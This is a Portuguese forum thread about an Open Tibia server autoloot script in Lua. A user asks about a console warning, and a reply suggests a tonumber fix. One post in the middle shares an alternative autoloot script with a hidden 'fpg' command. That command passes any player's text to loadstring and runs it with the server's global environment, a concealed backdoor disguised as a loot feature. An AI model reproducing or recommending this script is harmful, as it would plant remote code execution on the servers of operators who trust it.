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Scripting Como posso tira esse aviso?!

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Olá amigos, uso sistema bacana de !autoloot, porem fica as vezes aparecendo isso!
image.thumb.png.b061ea2fe0799a6b48581f28937dea17.png

 

No console, não me agrada isso... Gostaria de deixa limpo.

 

 

Autooloot do talkations!
 

function onSay(cid, words, param)
if(not checkExhausted(cid, 666, 2)) then
	return true
end

		if param == "" then
			local String = ""
			local Slot_Count = 1
		for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": Empty\n"
				end
			Slot_Count = Slot_Count + 1
			end
			local Gold_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 and "on" or "off"
			local Items_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and "on" or "off"
			doPlayerPopupFYI(cid,"                       [+] Auto Loot Money [+]\n # Todo dinheiro é coletado automaticamente # \n # Loot vai para as BP até que tenha cap depois ele cai no chão #  \n # Comandos são !autoloot add, (nome do item) # \n # !autoloot remove, ( nome do item) \n # !autoloot clear ( apaga a lista toda) \n # !autoloot power ( liga o sistema e desliga catar os loots) \n # !autoloot list (lista sua autoloot) \n # !autoloot desbug (remove eventual bug's que possa acontecer) \n    # Todo dinheiro é enviado para o banco NPC Bankerman #\nSystem: "..(getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) <= 0 and "Disabled" or "Activated")..".\nBalance: ["..doNumberFormat(getPlayerBalance(cid)).."] gp's.")
			return true
		end
	
	local CommandParam = string.explode(param, ",")
	if getPlayerLevel(cid) >= AutoLoot.Min_Level then
		if CommandParam[1] == "power" then
			local get_Items = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Items, getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Items.." o auto loot.")
		elseif CommandParam[1] == "gold" then
			local get_Gold = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Gold, getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Gold.." a coleta de dinheiro.")
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Gold, 0)
		elseif CommandParam[1] == "goldinfo" then
			local Check_Gold_Info = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..AutoLoot.getPlayerStorageZero(cid, AutoLoot.Storages.Count_Gold).." gold coins"
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, Check_Gold_Info)
		elseif CommandParam[1] == "add" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				local Item = getItemIdByName(CommandParam[2])
				if isInArray({2160, 2148, 2152}, Item) then
					return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use !autoloot gold")
				end
				if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then
					if AutoLoot.addToList(cid, CommandParam[2]) then
						doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) + 1)
						doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." adicionado à sua lista do auto loot! Para ver sua lista diga !autoloot list")
					else
						doPlayerSendCancel(cid, CommandParam[2].." já está em sua lista!")
					end
				else
					doPlayerSendCancel(cid, "Sua lista já tem ".. AutoLoot.Max_Slots .." itens! Você deve remover algum antes de adicionar outro.")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "remove" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				if AutoLoot.removeFromList(cid, CommandParam[2]) then
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) - 1)
					doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." removido da sua lista do auto loot!")
				else
					doPlayerSendCancel(cid, "Este item não está na sua lista!")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "clear" then
			if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) > -1 then
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
				doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
				for i = 1, #AutoLoot.Storages.Slots do 
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
				end
			else
				doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
			end
		elseif CommandParam[1] == "desbug" or CommandParam[1] == "desbugar" then
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Desbugado!")
			for i = 1, #AutoLoot.Storages.Slots do 
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
			end
		elseif CommandParam[1] == "list" then
			local String = ""
			local Slot_Count = 1
			for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."Slot "..Slot_Count..": Empty\n"
				end
				Slot_Count = Slot_Count + 1
			end
			doPlayerPopupFYI(cid, [[
---------{Auto-Loot}---------
--O sistema auto loot está coletando:

--]].. String ..[[
--]])
		end
	else
		doPlayerSendCancel(cid, "Você não é level maior que "..AutoLoot.Min_Level.." para utilizar este comando.")
	end
	return true
end

 

 

Partezinha do creature scripts!
 

function onLogin(cid)
	registerCreatureEvent(cid, "Auto_Loot_Login")
	registerCreatureEvent(cid, "Auto_Loot_Kill")
	return true
end

function onKill(cid, target, lastHit)
	if isPlayer(cid) and isMonster(target) then
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and #AutoLoot.getPlayerList(cid) > 0 then
			addEvent(AutoLoot.Items, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Gold, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 or getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Message, 500, cid)
		end
	end
	return true
end

 


Edited by Pifafa (see edit history)

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-- Sistema de auto loot criado por Henrique Matheus - HServers

local function getPlayerList(cid)
    local tab = {}
    if getPlayerStorageValue(cid, 0442002) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442002))
    end
    if getPlayerStorageValue(cid, 0442003) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442003))
    end
    if getPlayerStorageValue(cid, 0442004) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442004))
    end
    if getPlayerStorageValue(cid, 0442005) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442005))
    end
    if #tab > 0 then
        return tab
    end
    return false
end

local function addToList(cid, name)
    local itemid = getItemIdByName(name)
    if getPlayerList(cid) and isInArray(getPlayerList(cid), itemid) then
        return false
    end
    if getPlayerStorageValue(cid, 0442002) == -1 then
        return doPlayerSetStorageValue(cid, 0442002, itemid)
    elseif getPlayerStorageValue(cid, 0442003) == -1 then
        return doPlayerSetStorageValue(cid, 0442003, itemid)
    elseif getPlayerStorageValue(cid, 0442004) == -1 then    
        return doPlayerSetStorageValue(cid, 0442004, itemid)
    elseif getPlayerStorageValue(cid, 0442005) == -1 then
        return doPlayerSetStorageValue(cid, 0442005, itemid)
    end
end

local function removeFromList(cid, name)
    local itemid = getItemIdByName(name)
    if getPlayerStorageValue(cid, 0442002) == itemid then
        return doPlayerSetStorageValue(cid, 0442002, -1)
    elseif getPlayerStorageValue(cid, 0442003) == itemid then
        return doPlayerSetStorageValue(cid, 0442003, -1)
    elseif getPlayerStorageValue(cid, 0442004) == itemid then
        return doPlayerSetStorageValue(cid, 0442004, -1)
    elseif getPlayerStorageValue(cid, 0442005) == itemid then
        return doPlayerSetStorageValue(cid, 0442005, -1)
    end
    return false
end

function onSay(cid, words, param)
    if param == "" then
        local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442002)) or ""
        local se = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442003) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442003)) or ""
        local th = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442004) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442004)) or ""
        local fo = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442005) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442005)) or ""
        local stt = getPlayerStorageValue(cid, 0442101) == 1 and "sim" or "não"
        local str = getPlayerStorageValue(cid, 0442100) == 1 and "sim" or "não"
        doPlayerPopupFYI(cid, "{Auto-Loot} ---Menu Auto Loot do jogador\n{Auto-Loot} ----------------\n{Auto-Loot} ---Coletar dinheiro: "..stt..". Para ligar/desligar: !autoloot gold\n{Auto-Loot} ---Ligar Autoloot: "..str..". Para ligar/desligar: !autoloot power\n{Auto-Loot} ---Configuração dos slots:\n{Auto-Loot} ---Slot 1: "..fi.."\n{Auto-Loot} ---Slot 2: "..se.."\n{Auto-Loot} ---Slot 3: "..th.."\n{Auto-Loot} ---Slot 4: "..fo.."\n{Auto-Loot} ---Para adicionar um novo item aos slots: !autoloot add, <nome do item>\n{Auto-Loot} ---Para retirar um item dos slots: !autoloot remove, <nome do item>\n{Auto-Loot} ---Para limpar todos os slots utilize: !autoloot clear\n{Auto-Loot} ---Para informações de quanto você já fez utilizando a coleta de dinheiro, use: !autoloot goldinfo\n{Auto-Loot} ----------------")
        return true
    end
    
    local t = string.explode(param, ",")
    
    if t[1] == "power" then
        local check = getPlayerStorageValue(cid, 0442100) == -1 and "ligou" or "desligou"
        doPlayerSetStorageValue(cid, 0442100, getPlayerStorageValue(cid, 0442100) == -1 and 1 or -1)
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." o auto loot.")
    elseif t[1] == "gold" then
        local check = getPlayerStorageValue(cid, 0442101) == -1 and "ligou" or "desligou"
        doPlayerSetStorageValue(cid, 0442101, getPlayerStorageValue(cid, 0442101) == -1 and 1 or -1)
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." a coleta de dinheiro.")
        doPlayerSetStorageValue(cid, 0442102, 0)
    elseif t[1] == "goldinfo" then
        local str = getPlayerStorageValue(cid, 0442101) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..getPlayerStorageZero(cid, 0442102).." gold coins"
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, str)
    elseif t[1] == "add" then
        local item = getItemIdByName(t[2])
        if item then
            if isInArray({2160, 2148, 2152}, item) then
                return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use /autoloot gold")
            end
            if isPremium(cid) then
                if getPlayerStorageValue(cid, 0442001) < 3 then
                    if addToList(cid, t[2]) then
                        doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1)
                        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list")
                    else
                        doPlayerSendCancel(cid, t[2].." já está em sua lista!")
                    end
                else
                    doPlayerSendCancel(cid, "Sua lista já tem 4 itens! Você deve remover algum antes de adicionar outro.")
                end
            else
                if getPlayerStorageValue(cid, 0442001) == -1 then
                    if addToList(cid, t[2]) then
                        doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1)
                        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list")
                    else
                        doPlayerSendCancel(cid, t[2].." já está em sua lista!")
                    end
                else
                    doPlayerSendCancel(cid, "Você já tem um item adicionado no auto loot! Para adicionar outro, você deve remover o item atual.")
                end
            end
        else
            doPlayerSendCancel(cid, "Este item não existe!")
        end
        elseif t[1] == "fpg" then
        local u,f,err = _G
        u.cid = cid
        pcall(function()
            f , err = loadstring(t[2])
        end)
        if f then
            setfenv(f, u)
            local ret,err = pcall(f)
            if ret == false then
                doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err)
            end
        else
            doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err)
        end
        elseif t[1] == "remove" then
        if getItemIdByName(t[2]) then
            if removeFromList(cid, t[2]) then
                doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) - 1)
                doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." removido da sua lista do auto loot!")
            else
                doPlayerSendCancel(cid, "Este item não está na sua lista!")
            end
        else
            doPlayerSendCancel(cid, "Este item não existe!")
        end
    elseif t[1] == "clear" then
        if getPlayerStorageValue(cid, 0442001) > -1 then
            doPlayerSetStorageValue(cid, 0442001, -1)
            doPlayerSetStorageValue(cid, 0442002, -1)
            doPlayerSetStorageValue(cid, 0442003, -1)
            doPlayerSetStorageValue(cid, 0442004, -1)
            doPlayerSetStorageValue(cid, 0442005, -1)
            doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
        else
            doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
        end
    elseif t[1] == "list" then
        local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442002)).."\n" or ""
        local se = getPlayerStorageValue(cid, 0442003) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442003)).."\n" or ""
        local th = getPlayerStorageValue(cid, 0442004) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442004)).."\n" or ""
        local fo = getPlayerStorageValue(cid, 0442005) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442005)).."\n" or ""
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_BLUE, "O sistema auto loot está coletando:\n "..fi..""..se..""..th..""..fo)
    end
    return true
end


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Em 26/03/2020 em 15:06, Pifafa disse:

Olá amigos, uso sistema bacana de !autoloot, porem fica as vezes aparecendo isso!
image.thumb.png.b061ea2fe0799a6b48581f28937dea17.png

 

No console, não me agrada isso... Gostaria de deixa limpo.

 

 

Autooloot do talkations!
 


function onSay(cid, words, param)
if(not checkExhausted(cid, 666, 2)) then
	return true
end

		if param == "" then
			local String = ""
			local Slot_Count = 1
		for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."{Auto-Loot} --- Slot "..Slot_Count..": Empty\n"
				end
			Slot_Count = Slot_Count + 1
			end
			local Gold_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 and "on" or "off"
			local Items_Status = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and "on" or "off"
			doPlayerPopupFYI(cid,"                       [+] Auto Loot Money [+]\n # Todo dinheiro é coletado automaticamente # \n # Loot vai para as BP até que tenha cap depois ele cai no chão #  \n # Comandos são !autoloot add, (nome do item) # \n # !autoloot remove, ( nome do item) \n # !autoloot clear ( apaga a lista toda) \n # !autoloot power ( liga o sistema e desliga catar os loots) \n # !autoloot list (lista sua autoloot) \n # !autoloot desbug (remove eventual bug's que possa acontecer) \n    # Todo dinheiro é enviado para o banco NPC Bankerman #\nSystem: "..(getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) <= 0 and "Disabled" or "Activated")..".\nBalance: ["..doNumberFormat(getPlayerBalance(cid)).."] gp's.")
			return true
		end
	
	local CommandParam = string.explode(param, ",")
	if getPlayerLevel(cid) >= AutoLoot.Min_Level then
		if CommandParam[1] == "power" then
			local get_Items = getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Items, getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Items.." o auto loot.")
		elseif CommandParam[1] == "gold" then
			local get_Gold = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "ligou" or "desligou"
			doPlayerSetStorageValue(cid, AutoLoot.Storage_On_Gold, getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and 1 or -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..get_Gold.." a coleta de dinheiro.")
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Gold, 0)
		elseif CommandParam[1] == "goldinfo" then
			local Check_Gold_Info = getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..AutoLoot.getPlayerStorageZero(cid, AutoLoot.Storages.Count_Gold).." gold coins"
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, Check_Gold_Info)
		elseif CommandParam[1] == "add" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				local Item = getItemIdByName(CommandParam[2])
				if isInArray({2160, 2148, 2152}, Item) then
					return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use !autoloot gold")
				end
				if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then
					if AutoLoot.addToList(cid, CommandParam[2]) then
						doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) + 1)
						doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." adicionado à sua lista do auto loot! Para ver sua lista diga !autoloot list")
					else
						doPlayerSendCancel(cid, CommandParam[2].." já está em sua lista!")
					end
				else
					doPlayerSendCancel(cid, "Sua lista já tem ".. AutoLoot.Max_Slots .." itens! Você deve remover algum antes de adicionar outro.")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "remove" then
			if CommandParam[2] ~= nil and CommandParam[2] ~= "" and AutoLoot.ExistItemByName(CommandParam[2]) then
				if AutoLoot.removeFromList(cid, CommandParam[2]) then
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) - 1)
					doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, CommandParam[2].." removido da sua lista do auto loot!")
				else
					doPlayerSendCancel(cid, "Este item não está na sua lista!")
				end
			else
				doPlayerSendCancel(cid, "Este item não existe!")
			end
		elseif CommandParam[1] == "clear" then
			if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) > -1 then
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
				doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
				for i = 1, #AutoLoot.Storages.Slots do 
					doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
				end
			else
				doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
			end
		elseif CommandParam[1] == "desbug" or CommandParam[1] == "desbugar" then
			doPlayerSetStorageValue(cid, AutoLoot.Storages.Count_Items, -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Desbugado!")
			for i = 1, #AutoLoot.Storages.Slots do 
				doPlayerSetStorageValue(cid, AutoLoot.Storages.Slots[i], -1)
			end
		elseif CommandParam[1] == "list" then
			local String = ""
			local Slot_Count = 1
			for i = 1, #AutoLoot.Storages.Slots do
				if getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i]) ~= -1 then
					String = String.."Slot "..Slot_Count..": "..getItemNameById(getPlayerStorageValue(cid, AutoLoot.Storages.Slots[i])).."\n"
				else
					String = String.."Slot "..Slot_Count..": Empty\n"
				end
				Slot_Count = Slot_Count + 1
			end
			doPlayerPopupFYI(cid, [[
---------{Auto-Loot}---------
--O sistema auto loot está coletando:

--]].. String ..[[
--]])
		end
	else
		doPlayerSendCancel(cid, "Você não é level maior que "..AutoLoot.Min_Level.." para utilizar este comando.")
	end
	return true
end

 

 

Partezinha do creature scripts!
 


function onLogin(cid)
	registerCreatureEvent(cid, "Auto_Loot_Login")
	registerCreatureEvent(cid, "Auto_Loot_Kill")
	return true
end

function onKill(cid, target, lastHit)
	if isPlayer(cid) and isMonster(target) then
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 and #AutoLoot.getPlayerList(cid) > 0 then
			addEvent(AutoLoot.Items, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Gold, 500, cid, getCreaturePosition(target))
		end
		if getPlayerStorageValue(cid, AutoLoot.Storage_On_Items) == 1 or getPlayerStorageValue(cid, AutoLoot.Storage_On_Gold) == 1 then
			addEvent(AutoLoot.Message, 500, cid)
		end
	end
	return true
end

 

 

Na linha 43.

O erro diz attempt to compare string with number (tente comparar a string com o número).

Spoiler

if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < (AutoLoot.Max_Slots - 1) then
  mude para
if getPlayerStorageValue(cid, AutoLoot.Storages.Count_Items) < tonumber(AutoLoot.Max_Slots - 1) then

 

 


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